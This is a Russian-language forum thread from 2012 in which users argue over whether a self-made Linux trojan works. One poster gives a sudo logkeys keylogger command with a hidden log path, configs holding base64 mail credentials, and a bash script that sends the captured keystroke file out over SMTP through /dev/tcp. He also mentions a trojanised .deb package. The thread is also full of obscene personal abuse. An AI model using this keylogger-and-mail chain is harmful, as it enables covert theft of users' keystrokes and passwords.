Объявление

Односложные и бессмысленные темы, не несущие полезную нагрузку или не содержащие в себе вопрос, будут удаляться!

#1251 15-10-12 23:07:16

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Здесь с 01-06-10
Сайт
LinuxFirefox 16.0

Re: Обнаружен первый в истории троянец для Linux.

selenscy пишет:

Совершенно верно!

Бггг... Походу, ты вообще не понял, о чём речь lol

selenscy пишет:

А вот от этого пёрла Мудака-списиалиста я ваще выпал в осадок

//пожимая плечами:// ну, запусти:

sudo logkeys -s -o /usr/lib/engine/keys --no-func-keys

и выхлоп давай в студию.

"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

#1252 15-10-12 23:07:39

Павел
Участник
Здесь с 21-10-11
UbuntuFirefox 16.0

Apollo 11 пишет:

Можете испытать удовольствие

Уже.

ikkunan salvataja пишет:

оно молчит как партизан на допросе, от чего меня начинают терзать смутные подозрения что всё это чистой воды звиздёж.

"Неловко подозревать, когда вполне уверен" Станислав Ежи Лец.
Я даже не говорю о том, что таким образом наши "герои" будут, в основном, тыкаться в роутеры, которые в ответ будут тупо фыркать и бить хвостами. Но если кто-то проявит смекалку и засиропит им на e-mail фейковые явки и пароли с адресами тех служб, для которых "явки и пароли" - это рабочая терминология... Вот тогда и начнутся сцены из "Ну, погоди", где участвует бегемот. Ну, если, конечно, волк захочет отработать по всем записям в логах.
"Не ходите, дети, в Африку гулять!"  lol

#1253 15-10-12 23:15:34

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

Павел пишет:

Не понимаю, зачем городить всю эту тонкую эстетику с чтением всего из .conf, если вот это

Читаем один conf

почтовый ящик, от имени которого отправляют письма@mail.ru
почтовый ящик кому шлём@mail.ru
/место где храним скрипт/header
/место где храним скрипт/spam
smtp.mail.ru
dTg4MDc=
b20zN2twMVp6SA==
Subject
25
false
0

end configuration

А через какое то время засылаем на заветный сайтик, откуда скрипт скачивает conf немного другое

почтовый ящик, от имени которого отправляют письма@yandex.ru
почтовый ящик кому шлём@yandex.ru
/место где храним скрипт/header
/место где храним скрипт/keys
smtp.yandex.ru
dTg4MDc=
b20zN2twMVp6SA==
Subject
25
false
0

end configuration

Дошло до обладателя сервисов 24\7 ?  smile Или как до илитного Мудака, как до истинного списалиста через неделю в темечке что то щёлкнет  wink

Добавлено спустя 09 мин 01 с:

Apollo 11 пишет:

и выхлоп давай в студию.

[....пожимая плечами...]

А чо не так то?  smile

~$ sudo /usr/lib/engine/logk -s -o /usr/lib/engine/keys --no-func-keys
[sudo] password for afftar: 
~$

Отредактировано selenscy (15-10-12 23:17:11)

База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

#1254 15-10-12 23:28:57

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 16.0

selenscy пишет:

А чо не так то?

Да ты чо говоришь?

logkeys: Error opening output file '/usr/lib/engine/keys': No such file or directory

Добавлено спустя 01 мин 04 с:

selenscy пишет:

А чо не так то?

С правами на запуск будем продолжать или таки сам залезешь под шконку?

"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

#1255 15-10-12 23:31:02

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

Apollo 11 пишет:

Да ты чо говоришь?

Вот сиди и чешЫ свою унылую репу илитного Мудака  lol

Отредактировано selenscy (15-10-12 23:31:20)

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

#1256 15-10-12 23:32:34

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

selenscy пишет:

Вот сиди и чешЫ свою унылую репу

Может быть, всё же, хватит? Совершать ошибки не так плохо, как отказываться признавать их.

.:``́3̶E̶P̶O̶W̶h̶`́`:.

#1257 15-10-12 23:32:57

Apollo 11
Здесь с 01-06-10
Сайт
LinuxFirefox 16.0

selenscy пишет:

Вот сиди и чешЫ свою унылую репу илитного Мудака

Таки ты предпочёл залезть на привычное место под шконку. Ну, что ж, устраивайся поудобнее — тебе до-о-о-олго там придётся сидеть. Надо будет только блох после тебя потравить.
А я спать пошёл.

#1258 15-10-12 23:41:39

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

Apollo 11 пишет:

А я спать пошёл.

Позубри перед сном главу "Как правильно пользоваться bash", илитным Мудакам очень полезно, ибо тупы как пробки  smile

Добавлено спустя 19 мин 20 с:

Linups_Troolvalds пишет:

Может быть, всё же, хватит? Совершать ошибки не так плохо, как отказываться признавать их.

Вы это своему Мудаку, с большой буквы скажите  smile Этот Мудак до сих пор пытается!!!!!!!!!!!  cool  запустить логгер с опцией ведения лога в несуществующей директории у этого Мудака  cool на что поделиё честно говорит, что данной папки нет. Ну Мудак он, с большой буквы, хуле! У мну то эта папка есть  wink Ничто не мешает вести лог под погонялой keys в любом месте  big_smile Например так:

~$ sudo /usr/lib/engine/logk -s -o /var/log/keys --no-func-keys
~$ 

Надеюсь, что у илитных Мудаков-списиалистов-пенгванутых папка хотя бы /var/log таки существует  lol  lol  lol

Хоспадя, каких Мудаков только нету...... cool

Отредактировано selenscy (16-10-12 00:25:09)

#1259 16-10-12 00:24:06

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

selenscy пишет:

У мну то эта папка есть

Ага, а еще голова, в нее вы едите. Хватит уже, я сказал. Опытные спецы, собаку съевшие на впаривании своих поделок виндюшатам, типа дяди Жени, обламываются и не могут доказать существование в «диком» состоянии вирусов для линукса, а вы фантазируете, что делаете это. Ну и зачем? Это же даже не смешно.

#1260 16-10-12 00:30:27

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

Linups_Troolvalds пишет:

а вы фантазируете, что делаете это

Почему фантазии? Это реальный опыт. Естественно в тестовых целях, что бы в реале убедиться, что поделиё ничем не лучше в плане безопасности windows. И приёмы прокатывают абсолютно такие же  smile И даже примитивный шкрипт ставит раком таких вот илитных Мудаков Аполлош Троцких и остальных недалёких вместе с их поделиями.

Добавлено спустя 01 мин 37 с:

Linups_Troolvalds пишет:

Хватит уже, я сказал.

А не пошли бы вы сами знаете куда  wink Сказальщик, ёпть.

Отредактировано selenscy (16-10-12 00:34:24)

#1261 16-10-12 07:21:34

Linups_Troolvalds
С нами Баг!
Здесь с 06-10-09
LinuxChrome 22.0

selenscy пишет:

Это реальный опыт.

Заражения линуксов неработающими скриптами? Ну-ну.

#1262 16-10-12 07:24:15

pavel2403
Разбанен
Здесь с 06-10-09
Windows XPInternet Explorer 7.0

ikkunan salvataja пишет:

предсказание поведения чувствительных к малым воздействиям детерминировано-хаотических систем, как правило это прогнозы погоды. Разумеется точно вычислить невозможно, но чем выше разрядность обрабатываемых данных тем более точное предсказание.

Мля, я то думаю, почему по Питеру прогноз погоды вечно кривой или все наоборот, а это оказывается Акуна его на линуксе "предсказывает", ну теперь все ясно.

Добавлено спустя 23 мин 05 с:
Так мельком глянул срач.... Ну что можно сказать, Selencsy абсолютно прав в отношении квалификации присутствующих в этой теме линух-СпИциалистов. Особенно вот это порадовало:

Apollo 11 пишет:

logkeys: Error opening output file '/usr/lib/engine/keys': No such file or directory
С правами на запуск будем продолжать или таки сам залезешь под шконку?

Здесь черным по ангийски написано что программа не может запуститься из-за ошибки в параметре(Ну не может она открыть выходной файл)потому что не найдена дирректория в которой необходимо открыть этот файл или создать если его еще нет, а коллегу Selencsy 3 день пытаются допрашивать о  каких-то мифических правах на запуск! Причем здесь права, если система не может понять, что ей необходимо сделать? К тому же как не увидеть sudo в самом начале и при этом что-то плести про какие-то права, это по моему уже за гранью добра и зла. Луноходы, вас действительно конкретно нагнули, успокойтесь уже. С такими понятиями в вашем же языке программирования, судить о рабочем или не рабочем скрипте можно кому угодно, но только не вам. Сразу оговорюсь, ничего личного, это моя точка зрения с позиции именно как программиста с многолетним стажем.

Добавлено спустя 1 ч 25 мин 21 с:
Да, пока время есть, хочу добавить. В принципе этот сабж показательный, в плане свидетельства о никчемности луноходов как IT специалистов, о чем собсивенно здесь всегда и говорилось. "Хватание верхушек" без понимания сути процессов, заучивание умных слов и применение их к месту и не к месту вот это их фирменный стиль, поэтому над ними всегда смеялись и буду смеяться принимая за дурачков. Одно то, что они пытаться рассуждать о каком-то

предсказание поведения чувствительных к малым воздействиям детерминировано-хаотических систем

оперируя килоразрядными числами и при этом не в состоянии правильно интерпертировать вывод простейшей команды говорит практически обо всем их профиссиАНАЛизме. Им не нравиться винда потому что туда не везде можно залезть своими кривыми лапками, видите ли им реестр непонятен, они не могут туда залезть, а то что им там делать нехуй, как раз по причине того что они не понимают там нихуя, их как-то мало волнует. Еще бы,такое мудачило залезет, сломает все, а потом начинает по всем интернетам орать какое  говно это винда, и ни тени сомнения в своих кривых руках и тупых мозгах. Все-таки линух э то не система и не ядро и даже не философия- это психическое заболевание, причем хроническое, заразиться этой болезнью может не всякий, а только тот у кого к этой заразе есть предрасположенность, то ли на генитическом уровне, то ли воздействие социальной среды, не знаю, пусть врачи разбираются, но то что с этим надо что-то делать, как-то спасать людей, это уже очевидно.

Отредактировано pavel2403 (16-10-12 08:56:37)

Господа, вы охуели. Все. ©Cэмен

#1263 16-10-12 09:35:38

Rorschach
Еще один Великий Человек
Здесь с 04-05-10
Windows 7Chrome 22.0

pavel2403, Зебись паш, заебись, а теперь как этот "траян" размножить?

#1264 16-10-12 09:40:32

ikkunan salvataja
Участник
Здесь с 30-01-10
LinuxFirefox 10.0

pavel2403 пишет:

К тому же как не увидеть sudo в самом начале и при этом что-то плести про какие-то права,

Пашик, ну ты бы весь тред перечитал, чтобы понять о каких правах речь зашла. Права, с которыми скрипт будет выполняться, и права на запуск это какбэ несколько разные вещи. На
image.png
image.png
как говорится почувствуй разницу.

Yesterday it worked.
Today it is not working.
Windows is like that.

#1265 16-10-12 10:23:28

Павел
Участник
Здесь с 21-10-11
UbuntuFirefox 16.0

pavel2403 пишет:

ничего личного, это моя точка зрения с позиции именно как программиста с многолетним стажем.

Ну, как программисту с многолетним стажем, объясняю.
1. Никакого sudo нет в помине на "официальной" странице, согласно информации от wr224, который и является, по некоторым предположениям, биологическим отцом этого шедевра.
2. Никакое sudo не дает возможности выполнить файл, если он не имеет атрибута "x" (eXecutable)
3. Этот пункт я озвучу после, когда исправление, связанное с sudo, будет признано "отцом".

pavel2403 пишет:

Все-таки линух э то не система и не ядро и даже не философия- это психическое заболевание, причем хроническое, заразиться этой болезнью может не всякий, а только тот у кого к этой заразе есть предрасположенность, то ли на генитическом уровне, то ли воздействие социальной среды, не знаю, пусть врачи разбираются

Приходится признать, что в этом треде уже двое заразились, из числа истинных виндузятников, беспощадных к врагам Microsoft'а.
Кстати, "генитическом" - это вполне по Фрейду, да.  smile

#1266 16-10-12 10:59:57

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

pavel2403 пишет:

В принципе этот сабж показательный, в плане свидетельства о никчемности луноходов как IT специалистов, о чем собсивенно здесь всегда и говорилось. "Хватание верхушек" без понимания сути процессов, заучивание умных слов и применение их к месту и не к месту вот это их фирменный стиль, поэтому над ними всегда смеялись и буду смеяться принимая за дурачков.

smile

Ещё какой показательный! Столько лулзов от горе списиалистов  cool

Всех конечно же превзошёл Мудак, с большой буквы, илитный списиалист Аполлоша Троцкий  smile Это просто пиздец!

Отредактировано selenscy (16-10-12 11:03:03)

#1267 16-10-12 11:14:38

usual_user
Участник
Здесь с 30-03-11
UbuntuChromium 18.0

selenscy,  ну че ты разошелся? Сними уже в конце-то концов блокбастер, как твои трояны поражают твои же виртуалки. И я жду антивируса Selеnscogo. Делай карьеру. big_smile
Сколько же твой деб весит? И какой прогой мыло шлешь? А опенссш с нужным конфигом не осилил добавить? big_smile

Отредактировано usual_user (16-10-12 11:27:09)

Ущербность всегда агрессивна, и эта агрессивность проявляется прежде всего на уровне языка.
То, что о тебе говорят люди, никак не характеризует тебя, зато прекрасно характеризует их.
Кукушка тролит петуха, за то что тролит тот кукушку.

#1268 16-10-12 11:47:57

Белая рысь
Мартовский кот
Здесь с 13-08-10
Windows 8Internet Explorer 10.0

ikkunan salvataja пишет:

Криптография, предсказание поведения чувствительных к малым воздействиям детерминировано-хаотических систем, как правило это прогнозы погоды.

А, ну, это, несомненно, всё меняет.
Глупые взрослые какие-то CNG придумывают, специальные платформы создают под конкретные задачи с оптимизациями всякими... Ещё и железные решения в ряде случаев используют... А, оказывается, надо-то всего-навсего взять Linux и Perl - и всё будет.
Ну, и, естественно, наличие Perl под Windows ничего не меняет, потому что не искаропки. Я Вас правильно понял или что-то пропустил?

Да Белый рысь он из таких, "сам по себе", типа "пришел, увидел, обосрал"©wr224
Человек который работает в операционной системе - это пользователь. а линуксоид - это за##от малолетний, который по форумам орет "венда сакс"©Баш

#1269 16-10-12 12:28:32

ikkunan salvataja
Участник
Здесь с 30-01-10
LinuxFirefox 10.0

Белая рысь пишет:

Ещё и железные решения в ряде случаев используют..

А если речь идёт как раз об отработке прототипа какого железного устройства? Изначально то речь шла о нестандартных задачах для решения которых существующий софт по каким либо причинам не подходит.

Белая рысь пишет:

Ну, и, естественно, наличие Perl под Windows ничего не меняет, потому что не искаропки.

Вот в приведённом примере ничего, но не потому, что не искаропки, а потому, что Perl там никоим боком. И таки да, проще взять систему, которая изначально необходимыми возможностями обладает, нежели прикручивать всё это дополнительно.

Yesterday it worked.
Today it is not working.
Windows is like that.

#1270 16-10-12 12:37:38

wr224
Участник
Здесь с 03-10-09
Windows XPChrome 22.0

Apollo 11 пишет:

Это оно таким забавным способом пыталось решить проблему очищения логов

Ну а чем не способ?

Apollo 11 пишет:

Но ты увидел, куда это чЮдо пытается сохранять логи? Ты увидел, что оно пытается запускать скрипты, не дав прав?

...
chmod +x /место где храним скрипт/sys
chmod +x /место где храним скрипт/engine
...
Apollo 11 пишет:

Если попытаться запустить logkeys с этими параметрами, то logkeys выдаст ошибку.

Ты сам писал про первоначальный скрипт wink

Apollo 11 пишет:

Если попытаться запустить logkeys с этими параметрами, то logkeys выдаст ошибку.

logkeys нет под рукой, проверить не могу, да, и чтобы точно это проверить нужно знать версию logkeys, которая работает у selenscy, неужели ты не знаешь этого, иксперд?  wink Хотя если у тебя мегадистр, где даже sh слинкован на bash, то я не удивлен, что у тебя не работает  lol

линукс на дескторе это как спойлер на "девятке": 200+ она в своей жизни никогда не выжмет, зато пацанам можно сказать "у меня почти McLaren" (с) дохтур

#1271 16-10-12 12:55:40

Белая рысь
Мартовский кот
Здесь с 13-08-10
Windows 8Internet Explorer 10.0

ikkunan salvataja пишет:

а потому, что Perl там никоим боком

О, прошу прощения, конечно, не Perl, а Python... Запутался в ваших красноглазых костылях, прошу не винить сурово. У нас как-то поскромнее, cmd да powershell... Где уж нам все ваши *sh запомнить... А ещё ведь и Perl/Python/PHP/прочие-языки-вуду имеются...

Белая рысь пишет:

Ну, и, естественно, наличие Perl Python под Windows ничего не меняет, потому что не искаропки. Я Вас правильно понял или что-то пропустил?

ikkunan salvataja пишет:

А если речь идёт как раз об отработке прототипа какого железного устройства?

Отрабатывать прототип железяки на питоне? Мсье знает толк в извращениях... Ну, да почему бы и нет, в самом-то деле. Ну, если, конечно, не учитывать, что запихивать в прототип 1024-разрядное число вот так сразу - это просто охуенная ИКД. Имхо, прототипу и 32 бит за глаза хватит.

ikkunan salvataja пишет:

Изначально то речь шла о нестандартных задачах для решения которых существующий софт по каким либо причинам не подходит.

А Python - не имеющийся софт?  lol

ikkunan salvataja пишет:

И таки да, проще взять систему, которая изначально необходимыми возможностями обладает, нежели прикручивать всё это дополнительно.

ikkunan salvataja пишет:

Изначально то речь шла о нестандартных задачах для решения которых существующий софт по каким либо причинам не подходит.

Параграфы такие параграфы...

Да Белый рысь он из таких, "сам по себе", типа "пришел, увидел, обосрал"©wr224
Человек который работает в операционной системе - это пользователь. а линуксоид - это за##от малолетний, который по форумам орет "венда сакс"©Баш

#1272 16-10-12 13:08:25

selenscy
Участник
Здесь с 28-11-10
UbuntuFirefox 16.0

usual_user пишет:

Сколько же твой деб весит?

Ну смотря, что протроянить надо, а что?  smile

usual_user пишет:

И какой прогой мыло шлешь?

#!/bin/bash

e_from=`cat /usr/lib/engine/conf | awk '{if (NR==1) {print $1}}'`
  e_to=`cat /usr/lib/engine/conf | awk '{if (NR==2) {print $1}}'`
  header=`cat /usr/lib/engine/conf | awk '{if (NR==3) {print $1}}'`
  body=`cat /usr/lib/engine/conf | awk '{if (NR==4) {print $1}}'`
  e_server=`cat /usr/lib/engine/conf | awk '{if (NR==5) {print $1}}'`
  e_login=`cat /usr/lib/engine/conf | awk '{if (NR==6) {print $1}}'`
  e_pass=`cat /usr/lib/engine/conf | awk '{if (NR==7) {print $1}}'`
  subject=`cat /usr/lib/engine/conf | awk '{if (NR==8) {print $1}}'`
  e_port=`cat /usr/lib/engine/conf | awk '{if (NR==9) {print $1}}'`

exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
 read -r temp <&9
  echo "auth login" >&9
 read -r temp <&9
echo $e_login >&9
 read -r temp <&9
  echo $e_pass >&9
 read -r temp <&9
echo "Mail From: $e_from" >&9
 read -r temp <&9
echo "Rcpt To: $e_to" >&9
 read -r temp <&9
echo "Data" >&9
 read -r temp <&9
  cat $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
cat $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
exit 0

Выше всё описано и разжевано  smile И да! всяких монстроидальных тупорылых транспортов smtp, времён царя гороха, которые ставят себе идиоты с сервисами 24\7, илитные иксперды и прочая школота в этом случае нинада  smile Достаточно и примитивного скрипта  cool  Я таки надеюсь, что ты не будешь, как илитный Мудак, искать папку /usr/lib/engine  lol

usual_user пишет:

А опенссш с нужным конфигом не осилил добавить? big_smile

А ты думаешь зачем проверяется запущен sshd или нет?  wink

Отредактировано selenscy (16-10-12 13:14:02)

#1273 16-10-12 13:11:04

Okkamas Buddy
Участник
Здесь с 22-05-12
Windows 8Chrome 22.0

ikkunan salvataja пишет:

А если речь идёт как раз об отработке прототипа какого железного устройства? Изначально то речь шла о нестандартных задачах для решения которых существующий софт по каким либо причинам не подходит.

ikkunan salvataja пишет:

Вот в приведённом примере ничего, но не потому, что не искаропки, а потому, что Perl там никоим боком. И таки да, проще взять систему, которая изначально необходимыми возможностями обладает, нежели прикручивать всё это дополнительно.

"Зато у нас суперкомпьютеры, роутеры, банкоматы, сервера, мп3-плееры и андроид!" - как бы читается между строк smile

Случайности не случайны.

#1274 16-10-12 13:13:09

ikkunan salvataja
Участник
Здесь с 30-01-10
LinuxFirefox 10.0

Белая рысь пишет:

Отрабатывать прототип железяки на питоне?

А если я хочу проверить результат который мне железка выдала? Может я чего в схемотехнике накосячил.

Белая рысь пишет:

А Python - не имеющийся софт?

Необязательно, это может быть и инструмент для создания нужного софта. И этот инструмент в искаропочной винде отсутствует. Да и другим инструментом стандартный искаропочный линукс укомплектован получше, нежели чем таковая же винда.

Yesterday it worked.
Today it is not working.
Windows is like that.

#1275 16-10-12 13:14:27

Okkamas Buddy
Участник
Здесь с 22-05-12
Windows 8Chrome 22.0

ikkunan salvataja пишет:

стандартный искаропочный линукс

Это что за зверь? Где про такого почитать?

Случайности не случайны.

Сейчас в этой теме пользователей: 0, гостей: 1
[Bot] ClaudeBot

Подвал форума

Под управлением FluxBB
Модифицировал Visman

[ Сгенерировано за 0.013 сек, 7 запросов выполнено - Использовано памяти: 1.86 Мбайт (Пик: 1.94 Мбайт) ]